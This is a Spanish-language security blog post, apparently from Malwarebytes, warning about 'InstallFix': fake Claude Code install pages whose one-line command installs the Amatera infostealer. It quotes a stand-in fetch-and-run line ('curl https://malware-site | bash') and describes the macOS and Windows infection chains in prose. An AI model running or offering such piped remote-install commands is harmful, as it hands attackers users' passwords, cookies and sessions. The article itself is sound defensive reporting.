Los atacantes están clonando páginas de instalación de herramientas populares como Claude Code y sustituyendo los comandos de instalación de una sola línea por malware, principalmente para robar contraseñas, cookies, sesiones y acceso a entornos de desarrollo.
Las guías de instalación modernas suelen indicarte que copies un único comando como curl https://malware-site | bash en tu terminal y pulsa Intro. Ese hábito convierte el sitio web en un control remoto: cualquier script que se encuentre en esa URL se ejecuta con tus permisos, a menudo los de un administrador.
Los investigadores descubrieron que los atacantes abusan de este flujo de trabajo manteniendo todo idéntico y cambiando únicamente el destino al que se conecta esa línea de código. Para muchos usuarios no especialistas que acaban de empezar a utilizar herramientas de IA y de desarrollo, este método les parece normal, por lo que bajan la guardia.
Pero esto básicamente se reduce a «confío en este dominio», y eso no es una buena idea a menos que se tenga la certeza de que es fiable.
Normalmente ocurre así: alguien busca «Claude Code install» o «Claude Code CLI», ve un resultado patrocinado en la parte superior con una URL plausible y hace clic sin pensarlo demasiado.
Pero ese anuncio lleva a una página de documentación o descarga clonada: mismo logotipo, misma barra lateral, mismo texto y un botón «copiar» familiar junto al comando de instalación. En muchos casos, cualquier otro enlace en el que hagas clic en esa página falsa te redirige silenciosamente al sitio web real del proveedor, por lo que nada más parece sospechoso.
Similar a los ataques ClickFix, este método se denomina InstallFix. El usuario ejecuta el código que infecta su propio equipo, bajo falsos pretextos, y la carga útil suele ser un infostealer.
La carga útil principal en estos casos de InstallFix con el tema Claude Code es un ladrón de información llamado Amatera. Se centra en los datos del navegador, como contraseñas guardadas, cookies, tokens de sesión, datos de autocompletar e información general del sistema que ayuda a los atacantes a perfilar el dispositivo. Con eso, pueden secuestrar sesiones web e iniciar sesión en paneles de control en la nube y paneles de administrador internos sin necesidad de conocer su contraseña real. Algunos informes también mencionan un interés en carteras criptográficas y otras cuentas de alto valor.
Windows Mac
La campaña basada en Claude Code que encontraron los investigadores estaba preparada para atacar tanto a Mac Windows Mac .
En macOS, la línea maliciosa suele extraer un script de segunda fase de un dominio controlado por el atacante, a menudo ofuscado con base64 para que parezca ruidoso pero inofensivo a primera vista. A continuación, ese script descarga y ejecuta un binario de otro dominio, eliminando los atributos y haciéndolo ejecutable antes de lanzarlo.
En Windows, se ha visto que el comando genera cmd.exe, que luego llama a mshta.exe con una URL remota. Esto permite que la lógica del malware se ejecute como un binario confiable de Microsoft en lugar de un ejecutable aleatorio obvio. En ambos casos, no aparece nada espectacular en la pantalla: usted cree que solo ha instalado una herramienta, mientras que la carga útil real comienza a funcionar silenciosamente en segundo plano.
Cómo mantenerse seguro
Con ClickFix e InstallFix campando a sus anchas, y sin visos de desaparecer pronto, es importante estar alerta, tener cuidado y protegerse.
- Tómate tu tiempo. Note apresures a seguir las instrucciones de una página web o un mensaje, especialmente si te piden que ejecutes comandos en tu dispositivo o que copies y pegues código. Analiza lo que hará el comando antes de ejecutarlo.
- Evite ejecutar comandos o scripts de fuentes que no sean de confianza. Nuncaejecute código o comandos copiados de sitios web, correos electrónicos o mensajes a menos que confíe en la fuente y comprenda el propósito de la acción. Verifique las instrucciones de forma independiente. Si un sitio web le indica que ejecute un comando o realice una acción técnica, consulte la documentación oficial o póngase en contacto con el servicio de asistencia antes de continuar.
- Limite el uso de copiar y pegar para los comandos.Escribir los comandos manualmenteen lugar de copiarlos y pegarlos puede reducir el riesgo de ejecutar sin saberlo cargas maliciosas ocultas en el texto copiado.
- Proteja sus dispositivos. Utiliceunasolución antimalwareactualizada y en tiempo real con un componente de protección web.
- Infórmese sobre las técnicas de ataque en constante evolución.Comprender que los ataques pueden provenir de vectores inesperados y evolucionar ayuda a mantener la vigilancia. ¡Siga leyendo nuestro blog!
Consejo profesional:¿Sabías que el programa gratuito Malwarebytes Browser Guard te avisa cuando un sitio web intenta copiar algo en tu portapapeles?
No nos limitamos a informar de las amenazas: las eliminamos
Los riesgos de ciberseguridad nunca deben propagarse más allá de un titular. Mantenga las amenazas alejadas de sus dispositivos descargando Malwarebytes hoy mismo.
